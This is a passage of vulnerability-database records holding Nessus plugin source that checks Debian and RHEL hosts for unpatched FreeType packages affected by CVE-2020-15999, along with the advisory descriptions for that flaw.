'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']},\n {'reference':'freetype-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']},\n {'reference':'freetype-devel-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']},\n {'reference':'freetype-devel-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'i686', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']},\n {'reference':'freetype-devel-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']},\n {'reference':'freetype-devel-2.9.1-4.el8_1.1', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_appstream', 'rhel_e4s_8_1_baseos', 'rhel_e4s_8_1_highavailability', 'rhel_e4s_8_1_sap', 'rhel_e4s_8_1_sap_hana', 'rhel_eus_8_1_appstream', 'rhel_eus_8_1_baseos', 'rhel_eus_8_1_crb', 'rhel_eus_8_1_highavailability', 'rhel_eus_8_1_resilientstorage', 'rhel_eus_8_1_sap', 'rhel_eus_8_1_sap_hana', 'rhel_eus_8_1_supplementary']}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n var repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference &&\n release &&\n (rhel_decide_repo_check(repo_list:repo_list, repo_sets:repo_sets) || (!exists_check || rpm_exists(release:release, rpm:exists_check))) &&\n rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n}\n\nif (flag)\n{\n var subscription_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in the Red Hat Enterprise Linux\\n' +\n 'Extended Update Support or Update Services for SAP Solutions repositories.\\n' +\n 'Access to these repositories requires a paid RHEL subscription.\\n';\n var extra = NULL;\n if (empty_or_null(repo_sets)) extra = subscription_caveat + rpm_report_get() + redhat_report_repo_caveat();\n else extra = subscription_caveat + rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'freetype / freetype-devel');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:38:20", "description": "Sergei Glazunov discovered a heap-based buffer overflow vulnerability in the handling of embedded PNG bitmaps in FreeType. Opening malformed fonts may result in denial of service or the execution of arbitrary code.\n\nFor Debian 9 stretch, this problem has been fixed in version 2.6.3-3.2+deb9u2.\n\nWe recommend that you upgrade your freetype packages.\n\nFor the detailed security status of freetype please refer to its security tracker page at:\nhttps://security-tracker.debian.org/tracker/freetype\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-10-26T00:00:00", "type": "nessus", "title": "Debian DLA-2415-1 : freetype security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:freetype2-demos", "p-cpe:/a:debian:debian_linux:libfreetype6", "p-cpe:/a:debian:debian_linux:libfreetype6-dev", "p-cpe:/a:debian:debian_linux:libfreetype6-udeb", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2415.NASL", "href": "https://www.tenable.com/plugins/nessus/141910", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2415-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141910);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"Debian DLA-2415-1 : freetype security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Sergei Glazunov discovered a heap-based buffer overflow vulnerability\nin the handling of embedded PNG bitmaps in FreeType. Opening malformed\nfonts may result in denial of service or the execution of arbitrary\ncode.\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.6.3-3.2+deb9u2.\n\nWe recommend that you upgrade your freetype packages.\n\nFor the detailed security status of freetype please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/freetype\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/10/msg00026.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/freetype\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/freetype\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:freetype2-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfreetype6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfreetype6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libfreetype6-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"freetype2-demos\", reference:\"2.6.3-3.2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libfreetype6\", reference:\"2.6.3-3.2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libfreetype6-dev\", reference:\"2.6.3-3.2+deb9u2\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"libfreetype6-udeb\", reference:\"2.6.3-3.2+deb9u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-12-21T14:40:38", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in the RHSA-2020:4907 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 6.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2020-11-04T00:00:00", "type": "nessus", "title": "RHEL 7 : freetype (RHSA-2020:4907)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:freetype", "p-cpe:/a:redhat:enterprise_linux:freetype-demos", "p-cpe:/a:redhat:enterprise_linux:freetype-devel"], "id": "REDHAT-RHSA-2020-4907.NASL", "href": "https://www.tenable.com/plugins/nessus/142457", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:4907. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(142457);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-15999\");\n script_xref(name:\"RHSA\", value:\"2020:4907\");\n script_xref(name:\"IAVA\", value:\"2020-A-0486-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"RHEL 7 : freetype (RHSA-2020:4907)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by a vulnerability as referenced in\nthe RHSA-2020:4907 advisory.\n\n - freetype: Heap-based buffer overflow due to integer truncation in Load_SBit_Png (CVE-2020-15999)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/190.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-15999\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4907\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1890210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected freetype, freetype-demos and / or freetype-devel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-15999\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_cwe_id(122, 190);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype-demos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:freetype-devel\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar release = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nvar os_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar repositories = {\n 'enterprise_linux_7_client': [\n 'rhel-7-desktop-debug-rpms',\n 'rhel-7-desktop-fastrack-debug-rpms',\n 'rhel-7-desktop-fastrack-rpms',\n 'rhel-7-desktop-fastrack-source-rpms',\n 'rhel-7-desktop-optional-debug-rpms',\n 'rhel-7-desktop-optional-fastrack-debug-rpms',\n 'rhel-7-desktop-optional-fastrack-rpms',\n 'rhel-7-desktop-optional-fastrack-source-rpms',\n 'rhel-7-desktop-optional-rpms',\n 'rhel-7-desktop-optional-source-rpms',\n 'rhel-7-desktop-rpms',\n 'rhel-7-desktop-source-rpms'\n ],\n 'enterprise_linux_7_computenode': [\n 'rhel-7-for-hpc-node-fastrack-debug-rpms',\n 'rhel-7-for-hpc-node-fastrack-rpms',\n 'rhel-7-for-hpc-node-fastrack-source-rpms',\n 'rhel-7-for-hpc-node-optional-fastrack-debug-rpms',\n 'rhel-7-for-hpc-node-optional-fastrack-rpms',\n 'rhel-7-for-hpc-node-optional-fastrack-source-rpms',\n 'rhel-7-hpc-node-debug-rpms',\n 'rhel-7-hpc-node-optional-debug-rpms',\n 'rhel-7-hpc-node-optional-rpms',\n 'rhel-7-hpc-node-optional-source-rpms',\n 'rhel-7-hpc-node-rpms',\n 'rhel-7-hpc-node-source-rpms'\n ],\n 'enterprise_linux_7_server': [\n 'rhel-7-for-system-z-a-debug-rpms',\n 'rhel-7-for-system-z-a-optional-debug-rpms',\n 'rhel-7-for-system-z-a-optional-rpms',\n 'rhel-7-for-system-z-a-optional-source-rpms',\n 'rhel-7-for-system-z-a-rpms',\n 'rhel-7-for-system-z-a-source-rpms',\n 'rhel-7-for-system-z-debug-rpms',\n 'rhel-7-for-system-z-fastrack-debug-rpms',\n 'rhel-7-for-system-z-fastrack-rpms',\n 'rhel-7-for-system-z-fastrack-source-rpms',\n 'rhel-7-for-system-z-optional-debug-rpms',\n 'rhel-7-for-system-z-optional-fastrack-debug-rpms',\n 'rhel-7-for-system-z-optional-fastrack-rpms',\n 'rhel-7-for-system-z-optional-fastrack-source-rpms',\n 'rhel-7-for-system-z-optional-rpms',\n 'rhel-7-for-system-z-optional-source-rpms',\n 'rhel-7-for-system-z-rpms',\n 'rhel-7-for-system-z-source-rpms',\n 'rhel-7-server-debug-rpms',\n 'rhel-7-server-fastrack-debug-rpms',\n 'rhel-7-server-fastrack-rpms',\n 'rhel-7-server-fastrack-source-rpms',\n 'rhel-7-server-optional-debug-rpms',\n 'rhel-7-server-optional-fastrack-debug-rpms',\n 'rhel-7-server-optional-fastrack-rpms',\n 'rhel-7-server-optional-fastrack-source-rpms',\n 'rhel-7-server-optional-rpms',\n 'rhel-7-server-optional-source-rpms',\n 'rhel-7-server-rpms',\n 'rhel-7-server-source-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-debug-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-rpms',\n 'rhel-ha-for-rhel-7-for-system-z-source-rpms',\n 'rhel-ha-for-rhel-7-server-debug-rpms',\n 'rhel-ha-for-rhel-7-server-rpms',\n 'rhel-ha-for-rhel-7-server-source-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-debug-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-rpms',\n 'rhel-rs-for-rhel-7-for-system-z-source-rpms',\n 'rhel-rs-for-rhel-7-server-debug-rpms',\n 'rhel-rs-for-rhel-7-server-rpms',\n 'rhel-rs-for-rhel-7-server-source-rpms'\n ],\n 'enterprise_linux_7_workstation': [\n 'rhel-7-workstation-debug-rpms',\n 'rhel-7-workstation-fastrack-debug-rpms',\n 'rhel-7-workstation-fastrack-rpms',\n 'rhel-7-workstation-fastrack-source-rpms',\n 'rhel-7-workstation-optional-debug-rpms',\n 'rhel-7-workstation-optional-fastrack-debug-rpms',\n 'rhel-7-workstation-optional-fastrack-rpms',\n 'rhel-7-workstation-optional-fastrack-source-rpms',\n 'rhel-7-workstation-optional-rpms',\n 'rhel-7-workstation-optional-source-rpms',\n 'rhel-7-workstation-rpms',\n 'rhel-7-workstation-source-rpms'\n ],\n 'rhel_extras_7': [\n 'rhel-7-desktop-supplementary-rpms',\n 'rhel-7-desktop-supplementary-source-rpms',\n 'rhel-7-for-hpc-node-supplementary-rpms',\n 'rhel-7-for-hpc-node-supplementary-source-rpms',\n 'rhel-7-for-system-z-eus-supplementary-rpms',\n 'rhel-7-for-system-z-eus-supplementary-source-rpms',\n 'rhel-7-for-system-z-supplementary-debug-rpms',\n 'rhel-7-for-system-z-supplementary-rpms',\n 'rhel-7-for-system-z-supplementary-source-rpms',\n 'rhel-7-hpc-node-eus-supplementary-rpms',\n 'rhel-7-server-eus-supplementary-rpms',\n 'rhel-7-server-supplementary-rpms',\n 'rhel-7-server-supplementary-source-rpms',\n 'rhel-7-workstation-supplementary-rpms',\n 'rhel-7-workstation-supplementary-source-rpms'\n ],\n 'rhel_extras_oracle_java_7': [\n 'rhel-7-desktop-restricted-maintenance-oracle-java-rpms',\n 'rhel-7-for-hpc-node-restricted-maintenance-oracle-java-rpms',\n 'rhel-7-hpc-node-eus-restricted-maintenance-oracle-java-rpms',\n 'rhel-7-server-eus-restricted-maintenance-oracle-java-rpms',\n 'rhel-7-server-eus-restricted-maintenance-oracle-java-source-rpms',\n 'rhel-7-server-restricted-maintenance-oracle-java-rpms',\n 'rhel-7-workstation-restricted-maintenance-oracle-java-rpms'\n ],\n 'rhel_extras_rt_7': [\n 'rhel-7-server-nfv-debug-rpms',\n 'rhel-7-server-nfv-rpms',\n 'rhel-7-server-nfv-source-rpms',\n 'rhel-7-server-rt-debug-rpms',\n 'rhel-7-server-rt-rpms',\n 'rhel-7-server-rt-source-rpms'\n ],\n 'rhel_extras_sap_7': [\n 'rhel-sap-for-rhel-7-for-system-z-debug-rpms',\n 'rhel-sap-for-rhel-7-for-system-z-eus-debug-rpms',\n 'rhel-sap-for-rhel-7-for-system-z-eus-rpms',\n 'rhel-sap-for-rhel-7-for-system-z-eus-source-rpms',\n 'rhel-sap-for-rhel-7-for-system-z-rpms',\n 'rhel-sap-for-rhel-7-for-system-z-source-rpms',\n 'rhel-sap-for-rhel-7-server-debug-rpms',\n 'rhel-sap-for-rhel-7-server-e4s-debug-rpms',\n 'rhel-sap-for-rhel-7-server-e4s-rpms',\n 'rhel-sap-for-rhel-7-server-e4s-source-rpms',\n 'rhel-sap-for-rhel-7-server-eus-debug-rpms',\n 'rhel-sap-for-rhel-7-server-eus-rpms',\n 'rhel-sap-for-rhel-7-server-eus-source-rpms',\n 'rhel-sap-for-rhel-7-server-rpms',\n 'rhel-sap-for-rhel-7-server-source-rpms'\n ],\n 'rhel_extras_sap_hana_7': [\n 'rhel-sap-hana-for-rhel-7-server-debug-rpms',\n 'rhel-sap-hana-for-rhel-7-server-e4s-debug-rpms',\n 'rhel-sap-hana-for-rhel-7-server-e4s-rpms',\n 'rhel-sap-hana-for-rhel-7-server-e4s-source-rpms',\n 'rhel-sap-hana-for-rhel-7-server-eus-debug-rpms',\n 'rhel-sap-hana-for-rhel-7-server-eus-rpms',\n 'rhel-sap-hana-for-rhel-7-server-eus-source-rpms',\n 'rhel-sap-hana-for-rhel-7-server-rpms',\n 'rhel-sap-hana-for-rhel-7-server-source-rpms'\n ]\n};\n\nvar repo_sets = rhel_get_valid_repo_sets(repositories:repositories);\nif(repo_sets == RHEL_REPOS_NO_OVERLAP_MESSAGE) audit(AUDIT_PACKAGE_LIST_MISSING, RHEL_REPO_AUDIT_PACKAGE_LIST_DETAILS);\n\nvar pkgs = [\n {'reference':'freetype-2.8-14.el7_9.1', 'cpu':'i686', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-2.8-14.el7_9.1', 'cpu':'s390', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-2.8-14.el7_9.1', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-2.8-14.el7_9.1', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-demos-2.8-14.el7_9.1', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-demos-2.8-14.el7_9.1', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'cpu':'i686', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'cpu':'s390', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']},\n {'reference':'freetype-devel-2.8-14.el7_9.1', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_7_client', 'enterprise_linux_7_computenode', 'enterprise_linux_7_server', 'enterprise_linux_7_workstation', 'rhel_extras_7', 'rhel_extras_oracle_java_7', 'rhel_extras_rt_7', 'rhel_extras_sap_7', 'rhel_extras_sap_hana_7']}\n];\n\nvar 